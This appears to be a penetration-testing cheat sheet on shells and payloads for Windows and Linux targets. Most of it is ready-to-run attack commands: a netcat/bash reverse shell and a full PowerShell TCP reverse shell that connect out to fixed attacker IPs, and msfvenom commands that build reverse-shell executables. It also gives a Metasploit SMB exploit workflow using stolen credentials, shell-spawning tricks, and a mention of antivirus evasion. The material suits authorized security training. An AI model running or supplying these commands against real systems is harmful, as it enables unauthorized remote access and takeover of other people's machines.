Shells & Payloads: Payloads Overview
Payloads Overview
Types of Payloads
Staged Payloads
Sends initial stage first, then downloads main payload
Better for environments with sufficient memory
Example naming:
windows/meterpreter/reverse_tcp
Stageless Payloads
Entire payload sent at once
Ideal for low-bandwidth environments
Example naming:
windows/meterpreter_reverse_tcp
Essential Payload Commands
Netcat/Bash Reverse Shell
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
PowerShell Reverse Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"
MSFvenom Payload Generation
List Available Payloads
msfvenom -l payloads
Linux Payload Creation
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf
Windows Payload Creation
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
Windows System Infiltration
Fingerprinting Windows Hosts
TTL Check via Ping
ping <target_ip> # Look for TTL=128 or 32
Nmap OS Detection
sudo nmap -v -O <target_ip> sudo nmap -v -A <target_ip> # Aggressive scan
Key Windows Ports
139, 445: NetBIOS/SMB
135: MSRPC
443: HTTPS
Common Windows Payloads
DLLs: For privilege escalation and UAC bypass
Batch Files (.bat): Automation scripts
VBScript (.vbs): Client-side automation
MSI Files: Installation packages
PowerShell Scripts: System automation and exploitation
Metasploit Attack Workflow
# Start Metasploit
sudo msfconsole
# Search for exploit
search smb
# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>
# Execute
exploit
Linux System Infiltration
Pre-Exploitation Checklist
Interactive Shell Spawning Methods
Python TTY Shell
python -c 'import pty; pty.spawn("/bin/sh")'
Basic Shell Spawning
/bin/sh -i perl -e 'exec "/bin/sh";' ruby -e 'exec "/bin/sh";' lua -e 'os.execute("/bin/sh")' awk 'BEGIN {system("/bin/sh")}'
VIM Shell Escape
vim -c ':!/bin/sh' # Or in VIM: :set shell=/bin/sh :shell
Permission Checks
# File permissions
ls -la <path/to/file>
# Sudo permissions
sudo -l
Best Practices
Pre-Exploitation
Always perform thorough reconnaissance
Document all findings and attempted exploits
Verify target scope and permissions
Post-Exploitation
Maintain access securely
Document all changes made to the system
Clean up after testing is complete
Security Considerations
Use staged payloads for better reliability
Consider antivirus evasion techniques
Always use secure channels for communication